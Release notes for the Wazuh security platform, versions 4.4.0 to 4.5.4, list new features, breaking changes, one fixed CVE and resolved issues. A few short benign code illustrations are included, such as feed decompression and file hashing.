  • #16257 Fixed an error in the worker's Integrity sync task when a group folder was deleted in the master.

  • #16506 Fixed an error when trying to update an agent through the API or the CLI while pointing to a WPK file.

  • #15074 Fixed wazuh-remoted high CPU usage in a master node without agents.

  • #16101 Fixed a race condition in wazuh-analysisd handling the rule ignore option.

  • #16000 Fixed missing rules and decoders in the Analysisd JSON report.

  • #14356 Fixed translation of packages with a missing version in CPE Helper.

  • #15826 Fixed log date parsing at the predecoding stage.

  • #14019 Fixed a permission error in the JSON alert.

Agent
  • #13534 Fixed the architecture of the dependency URL for macOS.

  • #13588 Fixed a path length limitation that prevented FIM from reporting changes on Windows.

  • #14993 Updated the AWS integration to use the regions specified in the AWS config file when no regions are provided in ossec.conf.

  • #14850 Corrected the error code #2 for the SIGINT signal within the AWS integration.

  • #14740 Fixed the discard_regex functionality for the AWS GuardDuty integration.

  • #14500 Fixed error messages in the AWS integration when there is a ClientError.

  • #14493 Fixed an error that could lead to duplicate logs when using the same dates in the AWS integration.

  • #16116 Fixed the check_bucket method in the AWS integration to be able to find logs without a folder in root.

  • #16360 Added field validation for last_date.json in the Azure Storage integration.

  • #15763 Improved handling of invalid regions given to the VPCFlow AWS integration, enhancing exception clarity.

  • #16070 Fixed an error in the GCloud Subscriber unit tests.

  • #16410 Fixed the marker that AWS custom integrations use.

  • #16365 Fixed error messages when there are no logs to process in the WAF and Server Access AWS integrations.

  • #16463 Added region validation before instantiating the AWS service class in the AWS integration.

  • #14161 Fixed the InstallDate format in Windows installed programs.

  • #15428 Fixed the syscollector default interval time when the configuration is empty.

  • #16268 Fixed the agent starting with an invalid FIM configuration.

  • #15719 Fixed rootcheck scan trying to read deleted files.

  • #15739 Fixed compilation and build in Gentoo.

  • #19375 Fixed a crash when FIM scanned long Windows paths.

  • #19378 Fixed FIM who-data support for AArch64 platforms.

RESTful API
  • #13421 Fixed an unexpected behavior when using the q and select parameters in some endpoints.

  • #15203 Resolved an issue in the GET /manager/configuration API endpoint when retrieving the vulnerability detector configuration section.

  • #15152 Fixed a GET /agents/upgrade_result endpoint internal error with code 1814 in large environments.

  • #16756 Enhanced the alphanumeric_symbols regex to better accommodate specific SCA remediation fields.

  • #15967 Fixed a bug that would not allow retrieving the Wazuh logs if only the JSON format was configured.

  • #16310 Fixed an error in GET /rules when variables are used inside id or level ruleset fields.

  • #16248 Fixed the PUT /syscheck and PUT /rootcheck endpoints to exclude exception codes properly.

  • #16347 Adjusted test_agent_PUT_endpoints.tavern.yaml to resolve a race condition error.

  • #16844 Fixed some errors in API integration tests for RBAC white agents.

Wazuh dashboard
  • #4828 Fixed a trailing hyphen character for the OS value in the list of agents.

  • #4911 Fixed several typos in the code.

  • #4917 Fixed the display of more than one protocol in the Global configuration section.

  • #4918 Fixed an uncaught error and a wrong error message in the PCI DSS Control tab.

  • #4894 Fixed references to Elasticsearch in the Wazuh-stack plugin.

  • #5135 Fixed two errors that appeared in the console in the Settings > Configuration section.

  • #5376 Fixed the GitHub and Office 365 module visibility configuration for each API host that was not kept when changing/upgrading the plugin.

  • #5376 Fixed the GitHub and Office 365 modules appearing in the main menu when they were not configured.

  • #5364 Fixed a TypeError in FIM Inventory using a new error handler.

  • #5423 Fixed an error when using an invalid group configuration.

  • #5460 Fixed repeated requests in inventory data and configurations of an agent.

  • #5465 Fixed repeated requests in the group table when adding a group or refreshing the table.

  • #5521 Fixed an error in the request body suggestions of the API Console.

  • #5734 Fixed some errors related to the relative dirname of rule and decoder files.

  • #5879 Fixed package URLs in the aarch64 commands.

  • #5888 Fixed the install macOS agent commands.

Packages
  • #2495 Fixed debug redirection in packages installation in the Wazuh installation assistant.

  • #2490 Fixed dashboard dependencies in RHEL systems.

  • #2498 Replaced requestHeadersWhitelist with requestHeadersAllowlist.

  • #2486 Fixed common WPK container.

Changelogs

More details about these changes are provided in the changelog of each component:

4.5.4 Release notes - 23 October 2023

This section lists the changes in version 4.5.4. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This version includes new features or improvements, such as the following:

Manager
  • #19729 Added a timeout on requests between components through the cluster.

Resolved issues

This release resolves the following known issues:

Manager
  • #19702 Fixed a bug that might leave some worker's services hanging if the connection to the master was broken.

  • #19706 Fixed the vulnerability scan on the Windows agent when the OS version has no release data.

Changelogs

More details about these changes are provided in the changelog of each component:

4.5.3 Release notes - 10 October 2023

This section lists the changes in version 4.5.3. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This version includes new features or improvements, such as the following:

Manager
  • #18783 Vulnerability Detector now fetches the SUSE feeds in Gzip compressed format.
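
As a rough illustration of consuming a Gzip-compressed feed like the one mentioned above (a generic sketch, not the Vulnerability Detector's internal fetcher; the URL is a placeholder):

```python
import gzip
import urllib.request

FEED_URL = "https://example.com/oval/suse.xml.gz"  # placeholder, not a real feed URL

def download_feed(url: str = FEED_URL) -> bytes:
    """Download a .gz feed and return the decompressed payload."""
    with urllib.request.urlopen(url, timeout=30) as response:
        compressed = response.read()
    # Transferring the compressed file and inflating it locally keeps the
    # download small; the parser then works on the plain XML bytes.
    return gzip.decompress(compressed)
```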

Agent
  • #19205 Added support for macOS 14 (Sonoma).

RESTful API
  • #18509 Added support for the $ symbol in query values.

  • #18346 Added support for the @ symbol in query values.

  • #18493 Added support for nested queries in the q API parameter.

  • #18432 Updated force flag message in the agent_upgrade CLI.

Security updates

This release fixes the following vulnerabilities:

Agent
  • CVE-2023-42463 (#19069) Fixed a stack overflow hazard in wazuh-logcollector that could allow a local privilege escalation. Found by Keith Yeo (@kyeojy).

Resolved issues

This release resolves the following known issues:

Manager
  • #18737 Fixed a bug that might cause wazuh-analysisd to crash if it receives a status API query during startup.

  • #18976 Fixed a bug that might cause wazuh-maild to crash when handling large alerts.

  • #19217 Addressed an issue in Vulnerability Detector when fetching the SUSE Linux Enterprise 15 feeds.

Agent
  • #18773 Fixed a bug in the memory handling of the agent's data provider helper.

  • #18903 Fixed a data mismatch in the OS name between the global and agents' databases.

  • #19286 Fixed wrong Windows agent binaries metadata.

  • #19397 Fixed an error during the Windows agent upgrade.

RESTful API
  • #18362 Removed undesired characters when listing rule group names in GET /rules/groups.

  • #18434 Fixed an error when using the query condition=all in GET /sca/{agent_id}/checks/{policy_id}.

  • #18733 Fixed an error in the API log mechanism where sometimes the requests would not be printed in the log file.

Wazuh dashboard
  • #5925 Fixed the command for agent installation on SUSE to use zypper.

Wazuh Kibana plugin for Kibana 7.10.2
  • #5925 Fixed the command for agent installation on SUSE to use zypper.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x
  • #5925 Fixed the command for agent installation on SUSE to use zypper.

Packages
  • #2397 Changed GRUB options in the build OVA process.

  • #2453 Fixed an issue with the Wazuh dashboard port check despite the -p|--port installation assistant option being specified.

  • #2461 Fixed an issue when passwords were changed; the internal_users.yml file now gets updated.

  • #2492 Fixed missing removal of Wazuh indexer remaining files upon rollback.

Changelogs

More details about these changes are provided in the changelog of each component:

4.5.2 Release notes - 6 September 2023

This section lists the changes in version 4.5.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This version includes new features or improvements, such as the following:

Manager
  • #18085 wazuh-remoted now allows connection overtaking if the older agent doesn't respond for a while.

  • #18468 wazuh-remoted now prints the connection family when an unknown client gets connected.

  • #18437 The manager stops restricting the possible package formats in the inventory, to increase compatibility.

  • #18545 The manager stops blocking updates by WPK to macOS agents on ARM64, allowing custom updates.

  • #18770 Vulnerability Detector now fetches the Debian feeds in BZ2 compressed format.

Packages
  • #2337 Provided port number option to wazuh-install.sh script.

Resolved issues

This release resolves the following known issues:

Manager
  • #18472 Fixed a bug in wazuh-csyslogd that caused it to consume 100% of CPU while expecting new alerts.

Wazuh dashboard
  • #5764 Fixed an error with the commands in Deploy new agent for Oracle Linux 6+ agents.

  • #5796 Fixed broken documentation links in Management > Configuration.

Wazuh Kibana plugin for Kibana 7.10.2, 7.16.x, and 7.17.x
  • #5764 Fixed an error with the commands in Deploy new agent for Oracle Linux 6+ agents.

  • #5796 Fixed broken documentation links in Management > Configuration.

Changelogs

More details about these changes are provided in the changelog of each component:

4.5.1 Release notes - 24 August 2023

This section lists the changes in version 4.5.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights
  • Native support for Mac computers with Apple silicon. This release provides an ARM-ready Wazuh agent package for macOS.

Breaking changes

This release includes some breaking changes, such as the following:

Agent
  • #17748 Added the discard_regex functionality to Inspector and CloudWatchLogs AWS integrations.

    • With this change, execution stops without warning if you don't provide the field parameter when it is mandatory.
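
Conceptually, discard_regex drops events whose selected field matches a pattern before they are forwarded. The snippet below is only a schematic Python illustration of that filtering logic, not the integration's configuration syntax or code; the field name and pattern are made up:

```python
import re

DISCARD_FIELD = "state"                              # hypothetical field to inspect
DISCARD_REGEX = re.compile("^(PASSED|ARCHIVED)$")    # hypothetical discard pattern

def keep_event(event: dict) -> bool:
    """Return False for events whose selected field matches the discard pattern."""
    value = event.get(DISCARD_FIELD)
    if value is None:
        return True  # nothing to match against, keep the event
    return not DISCARD_REGEX.search(str(value))

events = [{"state": "PASSED", "id": 1}, {"state": "FAILED", "id": 2}]
forwarded = [e for e in events if keep_event(e)]  # only the FAILED event remains
```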

What's new

This version includes new features or improvements, such as the following:

Manager
  • #18142 Vulnerability Detector now fetches the RHEL 5 feed URL from https://feed.wazuh.com by default.

  • #16846 The Vulnerability Detector CPE helper has been updated.

Agent
  • #2224 Added native agent support for Apple silicon.

  • #17673 Added new validations for the AWS integration arguments.

  • #16607 The agent for Windows now loads its shared libraries after running the verification.

Ruleset
  • #17794 The SCA policy for Ubuntu Linux 20.04 (CIS v2.0.0) has been reworked.

  • #17812 Removed check 1.1.5 from Windows 10 SCA policy.

Other
  • #16990 The CURL library has been updated to v7.88.1.

Wazuh dashboard
  • #5478 Added Apple Silicon architecture button to the register Agent wizard.

  • #5497 Removed the agent name in the agent info ribbon.

  • #5539 Changed method to perform redirection on agent table buttons.

  • #5538 Changed Windows agent service name in the deploy agent wizard.

  • #5687 Changed the requests to get the agent labels from the managers.

Wazuh Kibana plugin for Kibana 7.10.2, 7.16.x, and 7.17.x
  • #5478 Added Apple Silicon architecture button to the register Agent wizard.

  • #5497 Removed the agent name in the agent info ribbon.

  • #5539 Changed method to perform redirection on agent table buttons.

  • #5538 Changed Windows agent service name in the deploy agent wizard.

  • #5687 Changed the requests to get the agent labels from the managers.

Resolved issues

This release resolves the following known issues:

Manager
  • #17866 Fixed a race condition in some RBAC unit tests by clearing the SQLAlchemy mappers.

  • #17490 Fixed a bug in wazuh-analysisd that could exceed the maximum number of fields when loading a rule.

  • #17126 Fixed a race condition in the wazuh-analysisd FTS list.

  • #17143 Fixed a crash in Analysisd when parsing an invalid decoder.

  • #17701 Fixed a segmentation fault in wazuh-modulesd due to a duplicate Vulnerability Detector configuration.

  • #16978 Fixed the Vulnerability Detector configuration for unsupported SUSE systems.

Agent
  • #17524 Fixed an InvalidRange error in the Azure Storage integration when trying to get data from an empty blob.

  • #17586 Fixed a memory corruption hazard in the FIM Windows Registry scan.

  • #17179 Fixed an error in Syscollector reading the CPU frequency on Apple M1.

  • #16659 Fixed the agent WPK upgrade for Windows that might leave the previous version in the Registry.

  • #17176 Fixed the agent WPK upgrade for Windows to get the correct path of the Windows folder.

RESTful API
  • #17632 Fixed the PUT /agents/upgrade_custom endpoint to validate that the file extension is .wpk.

  • #17660 Fixed errors in API endpoints to get labels and reports active configuration from managers.

Ruleset
  • #17941 Fixed CredSSP encryption enforcement at Windows Benchmarks for SCA.

  • #17940 Fixed an inverse logic in the MS Windows Server 2022 Benchmark for SCA.

  • #17779 Fixed a false positive in a Windows Eventchannel rule caused by a substring match.

  • #17813 Fixed missing whitespaces in SCA policies for Windows.

  • #17798 Fixed the description of a Fortigate rule.

Wazuh dashboard
  • #5471 Fixed the rendering of tables that contain IPs and agent overview.

  • #5490 Fixed the agents active coverage stat as NaN in the Details panel of the Agents section.

  • #5687 Fixed a broken documentation link to agent labels.

  • #5714 Fixed the PDF report filters applied to tables.

  • #5766 Fixed the outdated year in the PDF report footer.

Wazuh Kibana plugin for Kibana 7.10.2, 7.16.x, and 7.17.x
  • #5471 Fixed the rendering of tables that contain IPs and agent overview.

  • #5490 Fixed the agents active coverage stat as NaN in the Details panel of the Agents section.

  • #5687 Fixed a broken documentation link to agent labels.

  • #5714 Fixed the PDF report filters applied to tables.

  • #5766 Fixed the outdated year in the PDF report footer.

Changelogs

More details about these changes are provided in the changelog of each component:

4.5.0 Release notes - 10 August 2023

This section lists the changes in version 4.5.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This version includes new features or improvements, such as the following:

Manager
  • #17954 Vulnerability Detector now fetches the NVD feed from https://feed.wazuh.com, based on the NVD API 2.0.

    • The <update_from_year> option has been deprecated.

RESTful API
  • #17703 Modified the API integration tests to include Nginx LB logs in case of test failures.

Resolved issues

This release resolves the following known issues:

Manager
  • #17656 Fixed an error in the installation commands of the API and Framework modules when upgrading from sources.

  • #18123 Fixed the embedded Python interpreter to remove old Wazuh packages from it.

RESTful API
  • #17703 Fixed an error in the Nginx LB entrypoint of the API integration tests.

Changelogs

More details about these changes are provided in the changelog of each component:

4.4.5 Release notes - 10 July 2023

This section lists the changes in version 4.4.5. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Resolved issues

This release resolves the following known issues:

Installer
  • #2256 Fixed an error in the DEB packages that prevented the agent and manager from being installed on Debian 12.

  • #2257 Fixed a service requirement in the RPM packages that prevented the agent and manager from being installed on Oracle Linux 9.

Changelogs

More details about these changes are provided in the changelog of each component:

4.4.4 Release notes - 13 June 2023

This section lists the changes in version 4.4.4. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes the following new features and enhancements:

Agent
  • #17506 The Windows agent package signing certificate has been updated.

Ruleset
  • #17211 Updated all current rule descriptions from "Ossec" to "Wazuh".

Wazuh dashboard
  • #5416 Changed the title and added a warning in step 3 of the Deploy new agent section.

Wazuh Kibana plugin for Kibana 7.10.2
  • #5416 Changed the title and added a warning in step 3 of the Deploy new agent section.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x
  • #5416 Changed the title and added a warning in step 3 of the Deploy new agent section.

Resolved issues

This release resolves the following known issues:

Wazuh manager
  • #17178 The vulnerability scanner stops producing false positives for some Windows 11 vulnerabilities due to a change in the feed's CPE.

  • #16908 Prevented the VirusTotal integration from querying the API when the source alert misses the MD5.

Changelogs

More details about these changes are provided in the changelog of each component:

4.4.3 Release notes - 25 May 2023

This section lists the changes in version 4.4.3. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes the following new features and enhancements:

Agent
  • #16521 Added support for Apple Silicon processors to the macOS agent.

  • #2211 Prevented the installer from checking the old users ossecm and ossecr on upgrade.

  • #17195 Changed the deployment variables capture on macOS.

Ruleset
  • #17202 Unified the SCA policy names.

Resolved issues

This release resolves the following known issues:

Agent
  • #2217 Removed the temporary file "ossec.confre" after upgrade on macOS.

  • #2208 Prevented the installer from corrupting the agent configuration on macOS when deployment variables were defined on upgrade.

  • #2218 Fixed the installation on macOS by removing calls to launchctl.

Wazuh dashboard
  • #5481 #5484 Fixed the command to install the macOS agent on the agent wizard.

  • #5470 Fixed the command to start the macOS agent on the agent wizard.

Wazuh Kibana plugin for Kibana 7.10.2
  • #5481 #5484 Fixed the command to install the macOS agent on the agent wizard.

  • #5470 Fixed the command to start the macOS agent on the agent wizard.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x
  • #5481 #5484 Fixed the command to install the macOS agent on the agent wizard.

  • #5470 Fixed the command to start the macOS agent on the agent wizard.

Wazuh Splunk app
  • #1407 Fixed the macOS agent install and restart command.

Changelogs

More details about these changes are provided in the changelog of each component:

4.4.2 Release notes - 18 May 2023

This section lists the changes in version 4.4.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes the following new features and enhancements:

Wazuh manager
  • #15957 Removed an unused variable in wazuh-authd to fix a "String not null terminated" Coverity finding.

Agent
  • #16515 Added a new module to integrate with Amazon Security Lake as a subscriber.

  • #16847 Added support for localfile blocks deployment.

  • #16743 Changed netstat command on macOS agents.

Ruleset
  • #15566 Added macOS 13.0 Ventura SCA policy.

  • #15567 Added new ruleset for macOS 13 Ventura and older versions.

  • #16549 Added a new base ruleset for log sources collected from Amazon Security Lake.

Other
  • #16692 Added pyarrow and numpy Python dependencies.

  • #16692 Added importlib-metadata and zipp Python dependencies.

  • #17053 Updated Flask Python dependency to 2.2.5.

Resolved issues

This release resolves the following known issues:

Wazuh manager
  • #16394 Fixed a bug causing agent groups tasks status in the cluster not to be stored.

  • #16478 Fixed memory leaks in Vulnerability Detector after disk failures.

  • #16530 Fixed a pre-decoder problem with the + symbol in the macOS ULS timestamp.

Agent
  • #16517 Fixed an issue with MAC address reporting on Windows systems.

  • #16857 Fixed Windows unit tests hanging during execution.

RESTful API
  • #16381 Fixed agent insertion when no key is specified using the POST /agents/insert endpoint.

Wazuh dashboard
  • #5428 #5432 Fixed a problem in the backend service to get the plugin configuration.

Wazuh Kibana plugin for Kibana 7.10.2
  • #5428 Fixed a problem in the backend service to get the plugin configuration.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x
  • #5428 Fixed a problem in the backend service to get the plugin configuration.

Changelogs

More details about these changes are provided in the changelog of each component:

4.4.1 Release notes - 12 April 2023

This section lists the changes in version 4.4.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes the following new features and enhancements:

Wazuh manager
  • #15883 Improved WazuhDB performance by avoiding synchronizing existing agent keys and removing deprecated agent databases from var/db/agents.

RESTful API
  • #16541 Changed API limits protection to allow uploading new configuration files if limit is not modified.

Ruleset
  • #16017 Added Debian Linux 11 SCA policy.

  • #16016 Reworked the SCA policy for Red Hat Enterprise Linux 9.

Other
  • #16472 Updated embedded Python interpreter to 3.9.16.

  • #16492 Updated setuptools to 65.5.1.

Packages
  • #2150 The Wazuh dashboard is now based on OpenSearch dashboards 2.6.0.

  • #2150 The Wazuh indexer is now based on OpenSearch 2.6.0.

  • #2147 Added Debian 11 SCA files to specs.

Resolved issues

This release resolves the following known issues:

Wazuh manager
  • #16546 Reverted the addition of some mapping fields in the Wazuh template, causing a bug with expanded search.

Wazuh dashboard
  • #5196 Fixed the search in the agent inventory data tables.

  • #5334 Fixed the Top 5 users table overflow in the FIM dashboard.

  • #5337 Fixed a visual error in the About section.

  • #5329 Fixed the Anomaly and malware detection link.

  • #5341 Fixed an issue that did not allow closing the time picker when pressing the button multiple times in Agents and Management/Statistics.

Wazuh Kibana plugin for Kibana 7.10.2
  • #5196 Fixed the search in the agent inventory data tables.

  • #5329 Fixed the Anomaly and malware detection link.

  • #5341 Fixed an issue that did not allow closing the time picker when pressing the button multiple times in Agents and Management/Statistics.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x
  • #5196 Fixed the search in the agent inventory data tables.

  • #5329 Fixed the Anomaly and malware detection link.

  • #5341 Fixed an issue that did not allow closing the time picker when pressing the button multiple times in Agents and Management/Statistics.

Changelogs

More details about these changes are provided in the changelog of each component:

4.4.0 Release notes - 28 March 2023

This section lists the changes in version 4.4.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

This new version of Wazuh brings new features and adds support for some Linux distributions and integrations. For more details, the highlights of Wazuh 4.4.0 are listed below:

  • IPv6 support for the enrollment process and the agent-manager connection

  • Vulnerability detection support for SUSE agents

  • Wazuh indexer and dashboard are now based on OpenSearch 2.4.1

  • Rework of Ubuntu Linux 20.04 and 22.04 SCA policies

  • Support for Azure Integration in Linux agents

Below you can find more information about each of these highlights.

Wazuh 4.4.0 brings IPv6 support when connecting and enrolling an agent to a manager. The IPv6 protocol can handle packets more effectively, enhance performance, and boost security. This new feature allows agents to register and connect through an IPv6 address.
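
As a side note on what dual-stack support means in practice, the sketch below shows how address resolution returns both IPv4 and IPv6 endpoints and how a client can connect to whichever family is offered. It is a generic Python illustration, not the agent's actual implementation; the host name and port are placeholders.

```python
import socket

def resolve_manager(host: str = "wazuh-manager.example.com", port: int = 1514):
    """List candidate (family, address) pairs; AF_INET6 entries are IPv6."""
    candidates = []
    for family, _type, _proto, _canon, sockaddr in socket.getaddrinfo(
        host, port, type=socket.SOCK_STREAM
    ):
        label = "IPv6" if family == socket.AF_INET6 else "IPv4"
        candidates.append((label, sockaddr[0]))
    return candidates

# Example: resolve_manager("localhost") typically yields both
# ("IPv6", "::1") and ("IPv4", "127.0.0.1") on dual-stack hosts.
```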

SUSE agents now natively support vulnerability detection. Wazuh added full support for SUSE Linux Enterprise Server and Desktop operating systems versions 11, 12, and 15. The Vulnerability Detector now scans the programs identified by Syscollector, looking to report vulnerabilities described in the SUSE OVAL and the NVD databases.

Wazuh indexer and dashboard bump to OpenSearch 2.4.1. The Wazuh indexer and the Wazuh dashboard are based on OpenSearch, an open source search and analytics project derived from Elasticsearch and Kibana. We generated and tested the wazuh-indexer Debian and RPM packages with OpenSearch 2.4.1 and the wazuh-dashboard Debian and RPM packages with OpenSearch dashboards 2.4.1. This way, we avoid earlier version vulnerabilities and incorporate new functionalities.

To solve some errors in the previous Ubuntu Linux 20.04 SCA Policy, we reworked the Ubuntu Linux 20.04 and 22.04 SCA policies. As part of this task, we used the CIS Ubuntu Linux 22.04 LTS Benchmark v1.0.0 to update Ubuntu Linux 22.04 SCA Policy.

Wazuh added support for Azure Integration in Linux agents. Now this integration can run for both agents and managers. We modified the packages generation process to support Azure in those agents that are installed using the WPK packages. Each new WPK package contains all the updated binaries and source code, and the installer updates all files and binaries to support Azure integration.

Finally, it is worth noting that we maintain support for all installation alternatives and extend it by adding more recent versions.

Note

Starting with Wazuh v4.5.0, the central components will only support the Amazon Linux, RHEL, CentOS, and Ubuntu operating systems whose versions are officially supported by their vendors. Wazuh agents will maintain their current support status.

Breaking changes

This release includes some breaking changes, such as the following:

Wazuh manager
  • #10865 The agent key polling module has been ported to wazuh-authd.

RESTful API
  • #14119 Added new setting upload_wazuh_configuration to the Wazuh API configuration. The old parameter remote_commands is now part of this setting.

  • #14230 Deprecated the GET /manager/stats/analysisd, GET /manager/stats/remoted, GET /cluster/{node_id}/stats/analysisd, and GET /cluster/{node_id}/stats/remoted API endpoints. Use the new endpoints GET /manager/daemons/stats and GET /cluster/{node_id}/daemons/stats, respectively.

  • #16231 Removed RBAC group assignments' related permissions from DELETE /groups to improve performance and changed response structure.

Ruleset
  • The Wazuh ruleset has been updated. If you have a custom set of decoders and rules, please review the changes.

What's new

This version includes new features or improvements, such as the following:

Wazuh manager
  • #9995 Added new unit tests for cluster Python module and increased coverage to 99%.

  • #11190 Added file size limitation on cluster integrity sync.

  • #13424 Added unittests for CLIs script files.

  • #9962 Added support for SUSE in Vulnerability Detector.

  • #13263 Added support for Ubuntu Jammy in Vulnerability Detector.

  • #13608 Added a software limit to restrict the number of EPS a manager can process.

  • #11753 Added a new wazuh-clusterd task for agent-groups info synchronization.

  • #14950 Added unit tests for functions in charge of getting ruleset sync status.

  • #14950 Added auto-vacuum mechanism in wazuh-db.

  • #10843 Delta events in Syscollector when data gets changed may now produce alerts.

  • #10822 wazuh-logtest now shows warnings about ruleset issues.

  • #12206 Modulesd memory is now managed by jemalloc to help reduce memory fragmentation.

  • #12117 Updated the Vulnerability Detector configuration reporting to include MSU and skip JSON Red Hat feed.

  • #12352 Improved the shared configuration file handling performance.

  • #11753 The agent group data is now natively handled by Wazuh DB.

  • #10710 Improved security at cluster zip filenames creation.

  • #12390 The core/common.py module is refactored.

  • #12497 The format_data_into_dictionary method of WazuhDBQuerySyscheck class is refactored.

  • #11124 The maximum zip size that can be created while synchronizing cluster Integrity is limited.

  • #13065 The functions in charge of synchronizing files in the cluster are refactored.

  • #13079 Changed the MD5 hash function to BLAKE2 for cluster file comparison (see the sketch after this list).

  • #12926 Renamed wazuh-logtest and wazuh-clusterd scripts to follow the same scheme as the other scripts (spaces symbolized with _ instead of -).

  • #13741 Added the update field in the CPE Helper for Vulnerability Detector.

  • #11702 The agents with the same ID are prevented from connecting to the manager simultaneously.

  • #13713 wazuh-analysisd, wazuh-remoted, and wazuh-db metrics have been extended.

  • #11753 The number of wazuh-clusterd messages sent from workers to the master for agent-info tasks has been minimized and optimized.

  • #14244 The performance of the agent_groups CLI is improved when listing agents belonging to a group.

  • #14475 Changed wazuh-clusterd binary behavior to kill any existing cluster processes when executed.

  • #14791 Changed wazuh-clusterd tasks to wait asynchronously for responses coming from wazuh-db.

  • #11190 Use zlib for zip compression in cluster synchronization.

  • #12241 Added mechanism to dynamically adjust zip size limit in Integrity sync.

  • #12409 Removed the unused internal option wazuh_db.sock_queue_size.

  • #10940 Removed all the unused exceptions from the exceptions.py file.

  • #10740 Removed unused execute method from core/utils.py.

  • #13119 Removed unused set_user_name function in framework.

  • #12370 Unused internal calls to wazuh-db have been deprecated.

  • #14542 Debian Stretch support in Vulnerability Detector has been deprecated.

  • #15853 The status field in SCA is deprecated.

  • #16066 Agent group guessing now writes the new group directly on the master node based on the configuration hash.

  • #16098 Added cascading deletion of membership table entries when deleting a group.

  • #16499 Changed agent_groups CLI output so affected agents are not printed when deleting a group.
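
The change from MD5 to BLAKE2 for cluster file comparison (#13079 above) amounts to hashing each file's contents and comparing digests across nodes. The following Python sketch illustrates the idea using only the standard hashlib module; it is not the wazuh-clusterd implementation, and the helper names (blake2_digest, files_match) and the chunk size are illustrative choices.

    import hashlib

    def blake2_digest(path, chunk_size=64 * 1024):
        """Return the hexadecimal BLAKE2b digest of a file, reading it in chunks."""
        digest = hashlib.blake2b()
        with open(path, "rb") as handle:
            for chunk in iter(lambda: handle.read(chunk_size), b""):
                digest.update(chunk)
        return digest.hexdigest()

    def files_match(local_path, remote_digest):
        """Compare a local file against the digest reported by another node."""
        return blake2_digest(local_path) == remote_digest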

Wazuh agent
  • #11756 Added support for CPU frequency data provided by Syscollector on Raspberry Pi.

  • #11450 Added support for IPv6 address collection in the agent.

  • #11833 Added the process startup time data provided by Syscollector on macOS.

  • #11571 Added support for package retrieval in Syscollector for openSUSE Tumbleweed and Fedora 34.

  • #11640 Added the process startup time data provided by Syscollector on macOS.

  • #11796 Added support for package data provided by Syscollector on Solaris.

  • #10843 Added support for delta events in Syscollector when data gets changed.

  • #12035 Added support for pre-installed Windows packages in Syscollector.

  • #11268 Added support for IPv6 on agent-manager connection and enrollment.

  • #12582 Added support for CIS-CAT Pro v3 and v4 to the CIS-CAT integration module.

  • #10870 Added support for using the Azure integration module in Linux agents.

  • #11852 Added new error messages when using invalid credentials with the Azure integration.

  • #12515 Added reparse option to CloudWatchLogs and Google Cloud Storage integrations.

  • #14726 Wazuh Agent can now be built and run on Alpine Linux.

  • #15054 Added native Shuffle integration.

  • #11587 Improved the free RAM data provided by Syscollector.

  • #12752 The Windows installer (MSI) now provides signed DLL files.

  • #12748 Changed the group ownership of the Modulesd process to root.

  • #12750 Some parts of Agentd and Execd were refactored.

  • #10478 Handled new exceptions in the external integration modules.

  • #11828 Optimized the number of calls to DB maintenance tasks performed by the AWS integration.

  • #12404 Improved the reparse setting performance by removing unnecessary queries from external integrations.

  • #12478 Updated and expanded Azure module logging functionality to use the ossec.log file.

  • #12647 Improved the error management of the Google Cloud integration.

  • #12769 The logging tag in GCloud integration is deprecated. It now uses wazuh_modules debug value to set the verbosity level.

  • #12849 The last_dates.json file of the Azure module was deprecated in favor of a new ORM and database.

  • #12929 Improved the error handling in AWS integration's decompress_file method.

  • #11190 Improved the cluster compress/decompress methods. zlib is now used for zip compression in cluster synchronization.

  • #11354 The exception handling on Wazuh Agent for Windows was changed to DWARF2.

  • #14696 The root CA certificate for WPK upgrade has been updated.

  • #14822 Agents on macOS now report the OS name as "macOS" instead of "Mac OS X".

  • #14816 The Systemd service stopping policy has been updated.

  • #14793 Changed how the AWS module handles ThrottlingException, adding default values for connection retries when no config file is set (see the generic retry sketch after this list).

  • #15404 The agent for Windows now verifies its libraries to prevent side loading.

  • #14543 Specifying Azure and AWS credentials in the module configuration is deprecated as an authentication option.
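
For context on the ThrottlingException handling change above, the snippet below shows the general pattern of configuring botocore retries when creating a boto3 client. It is a generic sketch: the client name, attempt count, and retry mode are assumed illustrative values, not the Wazuh AWS module's actual code or defaults.

    import boto3
    from botocore.config import Config

    # Generic retry configuration; the values are illustrative, not the
    # Wazuh AWS module defaults.
    retry_config = Config(retries={"max_attempts": 10, "mode": "standard"})

    # A client built with this configuration transparently retries calls
    # rejected with throttling errors such as ThrottlingException.
    cloudwatch_logs = boto3.client("logs", config=retry_config)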

RESTful API
  • #10620 Added new API integration tests for a Wazuh environment without a cluster configuration.

  • #11731 Added wazuh-modulesd tags to GET /manager/logs and GET /cluster/{node_id}/logs endpoints.

  • #12438 Added Python decorator to soft deprecate API endpoints adding deprecation headers to their responses.

  • #12486 Added new exception to inform that /proc directory is not found or permissions to see its status are not granted.

  • #12362 Added new field and filter to GET /agents response to retrieve agent groups configuration synchronization status.

  • #12498 Added agent groups configuration synchronization status to GET /agents/summary/status endpoint.

  • #11171 Added JSON log handling.

  • #12029 Added integration tests for IPv6 agent's registration.

  • #12887 Enabled ordering the /groups endpoints by agent count.

  • #12092 Added a hash to API logs to identify users logged in with authorization context.

  • #14295 Added logic to API logger to renew its streams if needed on every request.

  • #14401 Added GET /manager/daemons/stats and GET /cluster/{node_id}/daemons/stats API endpoints.

  • #14464 Added GET /agents/{agent_id}/daemons/stats API endpoint.

  • #14471 Added the possibility to get the configuration of the wazuh-db component in active configuration endpoints.

